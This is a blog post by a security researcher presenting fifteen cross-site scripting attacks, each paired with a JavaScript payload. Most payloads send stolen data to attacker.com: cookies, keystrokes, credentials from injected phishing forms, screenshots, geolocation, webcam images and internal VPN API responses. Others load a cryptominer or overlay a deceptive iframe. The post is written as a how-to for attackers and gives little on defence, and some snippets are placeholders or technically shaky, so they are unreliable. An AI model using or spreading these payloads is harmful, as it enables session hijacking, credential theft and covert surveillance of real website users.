Open in app

Sign in

Write

Sign in

15 Creative and Advanced XSS Exploits That Will Change How You Think About Web Vulnerabilities

Viral Vaghela
5 min readNov 16, 2024

--

In this blog, we’ll explore 15 creative and advanced XSS exploits that push the boundaries of what you think is possible with this vulnerability. From leveraging browser APIs to chaining with other vulnerabilities, these examples reveal how XSS can be weaponized to bypass security mechanisms, achieve persistence, or even execute complex attacks in real-world scenarios.

1. Cryptojacking

What you can do: Use XSS to inject a script that runs cryptocurrency mining operations in the victim’s browser, consuming CPU resources.

  • How: You can inject a JavaScript miner that runs on the victim’s machine, silently mining cryptocurrency.
var script = document.createElement('script');
script.src = 'https://example.com/miner.js'; // External cryptojacking script
document.body.appendChild(script);

2. Manipulate Form Actions / Data

What you can do: By exploiting XSS, you can inject an iframe on a page and overlay it on top of a legitimate button or form, making it appear as though the user is interacting with the legitimate page when they are actually clicking on the malicious iframe.

How: Use XSS to create hidden or disguised elements that interact with the page in a deceptive manner.

var iframe = document.createElement('iframe');
iframe.src = 'http://attacker.com/malicious';
iframe.style.position = 'absolute';
iframe.style.top = '0';
iframe.style.left = '0';
iframe.style.opacity = '0.1'; // Invisible to the user
document.body.appendChild(iframe);

3. Steal or Manipulate Browser Cookies (Session Hijacking)

What you can do: Stealing cookies, particularly those used for authentication or other sensitive operations, is one of the most common exploits. If the application doesn’t set HttpOnly or Secure flags, cookies can be stolen via XSS.

How: Inject JavaScript to read cookies and send them to an attacker-controlled server.

Example

fetch('http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));

4. Keylogging via Event Listeners

What you can do: XSS can be used to inject a keylogger into the page, recording every keystroke made by the victim. This is especially dangerous on login forms or other pages where sensitive data is typed.

How: Use JavaScript to listen for key events and send captured data to an external server.

document.addEventListener('keydown', function(e) {
    fetch('http://attacker.com/keylog?key=' + encodeURIComponent(e.key));
});

5. Browser Exploitation (Escalating to RCE)

What you can do: If a user’s browser has a known vulnerability, you can use XSS to trigger exploits that escalate the attack to remote code execution (RCE). This can involve exploiting flaws in the browser or in extensions.

How: Combine XSS with an unpatched browser vulnerability to execute arbitrary code on the user’s machine.

Example: If there’s an unpatched vulnerability in the browser (e.g., CVE), XSS can be used to trigger it.

6. Mobile Device Exploitation (Browser Fingerprinting)

What you can do: XSS can be used to fingerprint mobile devices, tracking users across websites or exploiting browser features to gather detailed information.

How: Use injected JavaScript to collect data such as device type, screen size, and touch events, which could be used for further exploits or tracking.

var deviceInfo = {
  userAgent: navigator.userAgent,
  screenResolution: window.screen.width + 'x' + window.screen.height
};
fetch('http://attacker.com/fingerprint', {method: 'POST', body: JSON.stringify(deviceInfo)});

7. Injecting Phishing Forms to Steal Credentials

What you can do: Attackers can inject a fake login form or other sensitive forms into the page using XSS to steal user credentials.

How: Inject a form that mimics the original one but submits credentials to an external attacker-controlled server.

var form = document.createElement('form');
form.action = 'http://attacker.com/steal';
form.method = 'POST';
var username = document.createElement('input');
username.name = 'username';
var password = document.createElement('input');
password.name = 'password';
form.appendChild(username);
form.appendChild(password);
document.body.appendChild(form);
form.submit();

8. Exploiting Browser Autofill (Exposing Passwords)

What you can do: By injecting a hidden form field or modifying existing input fields, attackers can manipulate the browser’s autofill behavior to steal sensitive data like passwords or usernames.

How: Use XSS to modify form elements and capture autofill data when the browser suggests credentials.

Example

var input = document.createElement('input');
input.type = 'password';
input.autocomplete = 'current-password';
document.body.appendChild(input);
input.focus();

9. Capturing Screenshots of the Victim’s Browser

What you can do: Take a screenshot of the victim’s browser, capturing sensitive information displayed on the screen, such as session details, confidential data, or user interactions.

How: Inject JavaScript that uses the html2canvas library to render the visible portion of the webpage into a canvas element. Convert the canvas into an image and send it to an attacker-controlled server.

Example:

// Load the HTML2Canvas library dynamically
var script = document.createElement("script");
script.src = "https://cdnjs.cloudflare.com/ajax/libs/html2canvas/1.4.1/html2canvas.min.js";
script.onload = function () {
    // Capture screenshot when the library is loaded
    html2canvas(document.body).then(function (canvas) {
        // Convert canvas to a Base64 encoded image
        var screenshot = canvas.toDataURL("image/png");

        // Send the screenshot to the attacker's server
        var img = new Image();
        img.src = "http://attacker.com/collect_screenshot?screenshot=" + encodeURIComponent(screenshot);
    });
};
document.body.appendChild(script);

10. Weaponizing Clipboard Hijacking

What you can do: Inject malicious scripts to hijack the victim’s clipboard content and replace it with attacker-controlled data.

How: Use the clipboardData API to overwrite copied content with malicious payloads.

Example:

document.addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain', 'malicious payload here');
    e.preventDefault();
});

11. Injecting Malicious Browser Extensions

What you can do: Exploit XSS to prompt users to install malicious browser extensions, which can grant attackers extended access.

How: Craft a social engineering attack via XSS to trick users into installing an extension.

Example:

alert('Install this browser extension for a better experience: http://attacker.com/malicious-extension.crx');

12. Injecting Malicious WebAssembly (WASM) for Silent Payload Execution

What you can do: Use XSS to inject WebAssembly (WASM) code that silently executes complex payloads in the victim’s browser. This could include file exfiltration or system reconnaissance without the user being aware.

How: Embed a WASM binary or script to execute high-performance code via XSS.

Example:

var wasmBinary = new Uint8Array([...]); // Your compiled WebAssembly binary
WebAssembly.instantiate(wasmBinary).then(module => {
    module.exports.runMaliciousFunction();
});

13. Hijacking VPN Connections to Steal Sensitive Data

What you can do: If the web application interacts with a VPN or internal network, you can hijack the victim’s VPN session and exfiltrate data from internal systems.

How: Use XSS to target the internal API endpoints that the VPN client uses, sending requests to internal systems.

Example:

var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://internal-vpn.local/secret-api', true);
xhr.onload = function() {
    fetch('http://attacker.com/steal?data=' + encodeURIComponent(xhr.responseText));
};
xhr.send();

14. Tracking User Location via XSS

What you can do:
With XSS, an attacker can access the victim’s geographic location in real-time using the Geolocation API. This can be used for tracking or further targeted attacks.

How:
By exploiting XSS to inject JavaScript that triggers the navigator.geolocation.getCurrentPosition() API, an attacker can retrieve the victim's current location (latitude and longitude) and send it to their server.

Example:

if (navigator.geolocation) {
    navigator.geolocation.getCurrentPosition(
        pos => fetch(`http://attacker.com/stealGeoLocation?data=${encodeURIComponent(JSON.stringify({latitude: pos.coords.latitude, longitude: pos.coords.longitude}))}`),
        err => console.log('Geolocation error:', err)
    );
} else {
    console.log('Geolocation not supported');
}

15. Capture Webcam Pictures (Surreptitious Photography)

What you can do: By exploiting XSS, you can gain access to a user’s webcam without their knowledge and capture pictures. This is a privacy violation and can be used for malicious purposes.

How: Inject JavaScript that interacts with the browser’s navigator.mediaDevices.getUserMedia() API, which can access the user's webcam.

Example:

navigator.mediaDevices.getUserMedia({ video: true })
  .then(function(stream) {
    var video = document.createElement('video');
    video.srcObject = stream;
    video.play();

    var canvas = document.createElement('canvas');
    canvas.width = 640;
    canvas.height = 480;
    var context = canvas.getContext('2d');
    context.drawImage(video, 0, 0, canvas.width, canvas.height);

    // Convert canvas to image and send to attacker's server
    var imgData = canvas.toDataURL('image/png');
    fetch('http://attacker.com/upload', { method: 'POST', body: imgData });
  })
  .catch(function(error) {
    console.error('Webcam access denied:', error);
  });

found this article useful?

Feel free to connect with me on

linkedin/ Github / Twitter: https://viralvaghela.com

Xss Attack
Xss Vulnerability
Cyber Security Awareness
Red Team
Red Team Methodology

--

--

Viral Vaghela
Viral Vaghela

Written by Viral Vaghela

113 Followers
39 Following

𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲 Researcher • Software Developer •

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams